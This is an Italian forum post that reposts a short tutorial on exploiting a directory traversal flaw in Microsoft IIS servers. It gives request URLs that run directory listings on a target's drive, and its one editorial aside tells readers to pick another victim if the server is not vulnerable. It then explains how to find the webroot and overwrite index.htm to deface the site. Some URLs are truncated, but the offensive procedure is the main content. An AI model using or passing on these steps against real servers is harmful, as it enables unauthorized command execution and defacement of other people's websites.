mettiamo caso abbiamo trovato un server iis vediamo se è vulnerabile; esempio:

"""""

http://www.sito-con-iis.it

quindi testiamolo scrivendo:

http://www.sito-con-iis.it/scripts/r...ir%20c:dir+c:\

e vi risponderà con le cartelle dell'unita, se invece vi dice impossibile trovare la pagina cambiate vittima!

Se il server è vulnerabile cominciate a girare, se volete defacciare cercate la webroot in genere è c:\inetpub\wwwroot\ ma provate anche D E F G ecc, una volta che la trovate, in genere è index o default .htm oppure .asp dipende, scrivete:

http://www.sito-con-iis.it/scripts/r...root\index.htm

questo è l'esempio con la webroot su c:\inetpub\wwwroot e che porta il nome di index.htm cmq sostituiteli per il vostro caso.

""""""

l'ho trovato su un altro forum, di cui non do l'url per ovvie ragioni; comunque questo è quanto. Fatene buon uso e ditemi se sapete come risolverlo.